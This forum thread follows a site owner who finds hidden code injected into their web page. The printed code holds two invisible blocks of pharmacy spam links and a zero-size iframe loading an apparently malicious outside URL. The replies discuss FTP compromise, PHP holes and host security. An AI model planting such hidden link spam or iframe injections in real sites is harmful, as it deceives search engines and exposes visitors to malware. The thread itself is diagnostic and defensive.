How did this code get onto my site?

Simmy

Simmy

Simmy

Associate
Joined
26 Dec 2003
Posts
2,260
Location
UK
I noticed a slight glitch on the index page of my website yesterday;

Glitch

I'd not spotted it before so I checked the source code and this is what I found :eek: How on earth did it get on there? I checked the copy stored on my computer and it's perfectly clean! The glitch is gone when I move that code.

<div style="overflow:auto; height: 1px; ">

<div>
<h1>

<a href="http://www.beachhousehawaii.com/ba/ebay/log/product.php?item=Viagra">Order Viagra</a>
<a href="http://www.beachhousehawaii.com/ba/ebay/log/product.php?item=Viagra">Viagra</a>

<a href="http://www.scandiahealth.com/cart/in/viagra-side-effects.html">Viagra side effects</a>
<a href="http://www.scandiahealth.com/cart/in/buy-viagra-cheap.html">Buy viagra cheap</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-levitra.html">Viagra levitra</a>
<a href="http://www.scandiahealth.com/cart/in/buy-viagra-online.html">Buy viagra online</a>
<a href="http://www.scandiahealth.com/cart/in/original-viagra.html">Original viagra</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-pill.html">Viagra pill</a>

<a href="http://www.scandiahealth.com/cart/in/Viagra-Ireland.html">Viagra Ireland</a>
<a href="http://www.scandiahealth.com/cart/in/Cheapest-viagra.html">Cheapest viagra</a>
<a href="http://www.scandiahealth.com/cart/in/Order-Cialis.html">Order Cialis</a>
<a href="http://www.scandiahealth.com/cart/in/cialis-vs-viagra.html">Cialis vs viagra</a>
<a href="http://www.scandiahealth.com/cart/in/Levitra-online.html">Levitra online</a>
<a href="http://www.scandiahealth.com/cart/in/Purchase-viagra.html">Purchase viagra</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-sales.html">Viagra sales</a>
<a href="http://www.scandiahealth.com/cart/in/herbal-viagra.html">Herbal viagra</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-pharmacy.html">Viagra pharmacy</a>

<a href="http://www.scandiahealth.com/cart/in/natural-viagra.html">Natural viagra</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-sale.html">Viagra sale</a>
<a href="http://www.scandiahealth.com/cart/in/cialis-levitra-sales-viagra.html">Cialis levitra sales viagra</a>
<a href="http://www.scandiahealth.com/cart/in/buy-viagra-on-line.html">Buy viagra on line</a>
<a href="http://www.scandiahealth.com/cart/in/low-cost-viagra.html">Low cost viagra</a>
<a href="http://www.scandiahealth.com/cart/in/Real-viagra.html">Real viagra</a>
<a href="http://www.scandiahealth.com/cart/in/cheap-generic-viagra.html">Cheap generic viagra</a>
<a href="http://www.scandiahealth.com/cart/in/discount-viagra.html">Discount viagra</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-canada.html">Viagra canada</a>

<a href="http://www.scandiahealth.com/cart/in/viagra-cialis-levitra.html">Viagra cialis levitra</a>
<a href="http://www.scandiahealth.com/cart/in/Generic-viagra-Canada.html">Generic viagra Canada</a>
<a href="http://www.scandiahealth.com/cart/in/Generic-viagra-online.html">Generic viagra online</a>
<a href="http://www.scandiahealth.com/cart/in/cialis-compare-levitra-viagra.html">Cialis compare levitra viagra</a>
<a href="http://www.scandiahealth.com/cart/in/Cialis-online.html">Cialis online</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-sample.html">Viagra sample</a>
<a href="http://www.scandiahealth.com/cart/in/soft-viagra.html">Soft viagra</a>
<a href="http://www.scandiahealth.com/cart/in/discount-viagra-online.html">Discount viagra online</a>
<a href="http://www.scandiahealth.com/cart/in/buy-viagra-online-cheap.html">Buy viagra online cheap</a>

<a href="http://www.scandiahealth.com/cart/in/Order-Levitra.html">Order Levitra</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-uk.html">Viagra uk</a>
<a href="http://www.scandiahealth.com/cart/in/Order-Viagra.html">Order Viagra</a>
<a href="http://www.scandiahealth.com/cart/in/canada-online-pharmacy-viagra.html">Canada online pharmacy viagra</a>
<a href="http://www.scandiahealth.com/cart/in/Buy-levitra.html">Buy levitra</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-without-prescription.html">Viagra without prescription</a>
<a href="http://www.scandiahealth.com/cart/in/100mg-viagra.html">100mg viagra</a>
<a href="http://www.scandiahealth.com/cart/in/Viagra.html">Viagra</a>
<a href="http://www.scandiahealth.com/cart/in/lowest-viagra-price.html">Lowest viagra price</a>

<a href="http://www.scandiahealth.com/cart/in/viagra-alternative.html">Viagra alternative</a>
<a href="http://www.scandiahealth.com/cart/in/Discount-levitra.html">Discount levitra</a>
<a href="http://www.scandiahealth.com/cart/in/where-to-buy-viagra.html">Where to buy viagra</a>

</h1>
<div>
<div style="overflow:auto; height: 1px; ">

<div>
<h1>
<a href="http://www.viagra-online-med.com/">Buy generic viagra</a>
<a href="http://www.lebaneseproducts.com/tmp/Compare-viagra.html">Compare viagra</a>

<a href="http://www.lebaneseproducts.com/tmp/How-to-buy-viagra.html">How to buy viagra</a>
<a href="http://www.lebaneseproducts.com/tmp/On-line-viagra.html">On line viagra</a>
<a href="http://www.lebaneseproducts.com/tmp/Order-viagra.html">Order viagra</a>
<a href="http://www.lebaneseproducts.com/tmp/Purchase-viagra-online.html">Purchase viagra online</a>
<a href="http://www.lebaneseproducts.com/tmp/Viagra-comparison.html">Viagra comparison</a>
<a href="http://www.lebaneseproducts.com/tmp/Compare-viagra.html">Viagra medication</a>
<a href="http://www.lebaneseproducts.com/tmp/Viagra-online-pharmacy.html">Viagra online pharmacy</a>
<a href="http://www.lebaneseproducts.com/tmp/Viagra-soft-tab.html">Viagra soft tab</a>
<a href="http://www.lebaneseproducts.com/tmp/Viagra-tablet.html">Viagra tablet</a>

<a href="http://www.beachhousehawaii.com/ba/ebay/log/product.php?item=Viagra">Generic viagra Canada</a>
<a href="http://www.beachhousehawaii.com/ba/ebay/log/product.php?item=Viagra">Order Viagra</a>
<a href="http://www.beachhousehawaii.com/ba/ebay/log/product.php?item=Viagra">Viagra</a>
<a href="http://www.beachhousehawaii.com/ba/ebay/log/product.php?item=Viagra">Viagra soft tab</a>
<a href="http://www.beachhousehawaii.com/ba/ebay/log/product.php?item=Viagra">cheap drugs</a>
<a href="http://www.beachhousehawaii.com/ba/ebay/log/product.php?item=Cialis">cialis online pharmacy</a>
<a href="http://www.beachhousehawaii.com/ba/ebay/log/product.php?item=Cialis">order cialis</a>
<a href="http://www.beachhousehawaii.com/ba/ebay/log/product.php?item=Cialis">cheap cialis</a>

<a href="http://www.beachhousehawaii.com/ba/ebay/log/product.php?item=Lipitor">Lipitor</a>
<a href="http://www.beachhousehawaii.com/ba/ebay/log/product.php?item=Lipitor">generic lipitor</a>
<a href="http://www.beachhousehawaii.com/ba/ebay/log/product.php?item=Cipro">cipro antibiotic</a>
<a href="http://www.beachhousehawaii.com/ba/ebay/log/product.php?item=Levitra">buy levitra</a>
<a href="http://www.beachhousehawaii.com/ba/ebay/log/product.php?item=Diflucan">buy diflucan</a>
<a href="http://www.beachhousehawaii.com/ba/ebay/log/product.php?item=Propecia">order propecia</a>
<a href="http://www.beachhousehawaii.com/ba/ebay/log/product.php?item=Fosamax">Fosamax</a>
<a href="http://search.live.com/results.aspx?q=www.trifacta.net">Viagra</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-side-effects.html">Viagra side effects</a>

<a href="http://www.scandiahealth.com/cart/in/buy-viagra-cheap.html">Buy viagra cheap</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-levitra.html">Viagra levitra</a>
<a href="http://www.scandiahealth.com/cart/in/buy-viagra-online.html">Buy viagra online</a>
<a href="http://www.scandiahealth.com/cart/in/original-viagra.html">Original viagra</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-pill.html">Viagra pill</a>
<a href="http://www.scandiahealth.com/cart/in/Viagra-Ireland.html">Viagra Ireland</a>
<a href="http://www.scandiahealth.com/cart/in/Cheapest-viagra.html">Cheapest viagra</a>
<a href="http://www.scandiahealth.com/cart/in/Order-Cialis.html">Order Cialis</a>
<a href="http://www.scandiahealth.com/cart/in/cialis-vs-viagra.html">Cialis vs viagra</a>

<a href="http://www.scandiahealth.com/cart/in/Levitra-online.html">Levitra online</a>
<a href="http://www.scandiahealth.com/cart/in/Purchase-viagra.html">Purchase viagra</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-sales.html">Viagra sales</a>
<a href="http://www.scandiahealth.com/cart/in/herbal-viagra.html">Herbal viagra</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-pharmacy.html">Viagra pharmacy</a>
<a href="http://www.scandiahealth.com/cart/in/natural-viagra.html">Natural viagra</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-sale.html">Viagra sale</a>
<a href="http://www.scandiahealth.com/cart/in/cialis-levitra-sales-viagra.html">Cialis levitra sales viagra</a>
<a href="http://www.scandiahealth.com/cart/in/buy-viagra-on-line.html">Buy viagra on line</a>

<a href="http://www.scandiahealth.com/cart/in/low-cost-viagra.html">Low cost viagra</a>
<a href="http://www.scandiahealth.com/cart/in/Real-viagra.html">Real viagra</a>
<a href="http://www.scandiahealth.com/cart/in/cheap-generic-viagra.html">Cheap generic viagra</a>
<a href="http://www.scandiahealth.com/cart/in/discount-viagra.html">Discount viagra</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-canada.html">Viagra canada</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-cialis-levitra.html">Viagra cialis levitra</a>
<a href="http://www.scandiahealth.com/cart/in/Generic-viagra-Canada.html">Generic viagra Canada</a>
<a href="http://www.scandiahealth.com/cart/in/Generic-viagra-online.html">Generic viagra online</a>
<a href="http://www.scandiahealth.com/cart/in/cialis-compare-levitra-viagra.html">Cialis compare levitra viagra</a>

<a href="http://www.scandiahealth.com/cart/in/Cialis-online.html">Cialis online</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-sample.html">Viagra sample</a>
<a href="http://www.scandiahealth.com/cart/in/soft-viagra.html">Soft viagra</a>
<a href="http://www.scandiahealth.com/cart/in/discount-viagra-online.html">Discount viagra online</a>
<a href="http://www.scandiahealth.com/cart/in/buy-viagra-online-cheap.html">Buy viagra online cheap</a>
<a href="http://www.scandiahealth.com/cart/in/Order-Levitra.html">Order Levitra</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-uk.html">Viagra uk</a>
<a href="http://www.scandiahealth.com/cart/in/Order-Viagra.html">Order Viagra</a>
<a href="http://www.scandiahealth.com/cart/in/canada-online-pharmacy-viagra.html">Canada online pharmacy viagra</a>

<a href="http://www.scandiahealth.com/cart/in/Buy-levitra.html">Buy levitra</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-without-prescription.html">Viagra without prescription</a>
<a href="http://www.scandiahealth.com/cart/in/100mg-viagra.html">100mg viagra</a>
<a href="http://www.scandiahealth.com/cart/in/Viagra.html">Viagra</a>
<a href="http://www.scandiahealth.com/cart/in/lowest-viagra-price.html">Lowest viagra price</a>
<a href="http://www.scandiahealth.com/cart/in/viagra-alternative.html">Viagra alternative</a>
<a href="http://www.scandiahealth.com/cart/in/Discount-levitra.html">Discount levitra</a>
<a href="http://www.scandiahealth.com/cart/in/where-to-buy-viagra.html">Where to buy viagra</a>

</h1>
<div>
<iframe src="http://isecurepages.net/out.php?s_id=11" width=0 height=0></iframe>

</body>
Click to expand...
 
I'd change your ftp/cpanel password if I were you. But it could also be some kind of server side attack that probably effected lots of customers.
 
I've told UH Hosting about it and I'm waiting to see what they have to say :) I'm just glad all those links weren't visible on the site as I'm sure it would have put put off potential customers!
 
This could be one of 3 things.

- Someone knows or has guessed your FTP password
- You have a PHP script which is vulnerable to an XSS attack. The attackers have managed to convince your script to write to your files
- Your hosting provider's server has been rooted

HTH :)
 
You have been hacked. What they have tried todo is make it so the links dont show but they get back logs on google etc for better rank witch means better income etc. i would go and change your cpanel/account password to somthing more harder to crack. and if your useing php and u coded it u mite also have a nice lil hole in your coding. when i learnt php awhile back people who knew what they were doing could upload files to my server through the php page.

Good luck with it.
 
Thanks for the advice all. I did code the php script myself, so chances are that's the problem :p The glitch has appeared a couple of times now, but it was only this time I noticed what was causing it. I'll change my password first and see if it happens again.
 
It's UH Hosting. They're crap. Some web space I have with them got infected with this crap too and my password isn't in the dictionary and would take several years to brute.
 
Haha UH. I remember the guy who runs it used to post on another forum about 5 years ago.. I would switch hosting and save yourself valuable time.
 
Simmy said:
Thanks for the advice all. I did code the php script myself, so chances are that's the problem :p The glitch has appeared a couple of times now, but it was only this time I noticed what was causing it. I'll change my password first and see if it happens again.
Click to expand...

Its the **** hosting company. I have just checked my website and it has also been attacked with an iframe for the 3rd time. I am really getting annoyed at this now. I emailed them last time it happened to ask them why it is happening and why they hadn't alerted me since their were posts all over their forums about it. They fobbed me off telling me they have checked all their security and it is fine so they have deduced that it is not their problem.

http://forums.uh-hosting.co.uk/showthread.php?t=2876

When my contract period ends I am outta there.
 
Well I've just switched to Streamline, who are saving me £60 per year compared to UH Hosting! And they offer unlimited bandwidth/webspace. The account was setup instantly aswell, so i'm very impressed thus far :)
 
You should switch to IIS 6. It will sandbox the PHP processes.

Out-of-the-box... IIS security > Apache security.
 
Sandboxing would have prevented the exploited PHP process from affecting other accounts on the same server.
 
Sandboxing PHP shouldn't be necessary if the rest of your system is secure...

Unless the files which were modified were owned by the same user PHP on the compromised site was running under or had global write permissions, there is clearly something more serious going on than a PHP bug.

I'm not saying we're perfect. We had a server compromised (the first in 3.5 years and 100+ servers) a few months ago and we learnt a lot from it. No matter how secure you think a system is, there's always a way in...
 
All I know is this:

The code is added to an account via FTP. It’s all automated, a machine connects, downloads an index file then within 4 secs it is re-uploaded with the suspect line added.

What I don’t know and what worries me to death, is how they gained entry to FTP in the first place with a specific user + pass.

There was also a ProFTPd exploit (we were up to date at the time and the hole that could allow the exploit wasn’t patched until recently) that *may* have allowed an exploit to take place. So all machines are now running Pure-FTPd.

Our servers run PHP as CGI, all but one are using PHPSUEXEC. Interestingly the problem hasn’t occurred on one of our servers that runs suPHP (PHPSUEXEC alternative) – All this means PHP runs as the real user and not the Apache user “nobody”. Making it easier to identify problem sites, limit resource usage etc.
 
Aye, it is very odd and rather worrying. It's possible for PHP to be rooted (happened with v4.4.3-related - was an exploit script in the wild for that), or it's possible someone rooted the server entirely separately and has managed to crack the passwords. I would scramble user passwords - though that's a complete pain for users....we can't win :(

/Goes back to cPanel forums, though I wonder if OcUK > cPanel :D
 
You must log in or register to reply here.
Back
Top Bottom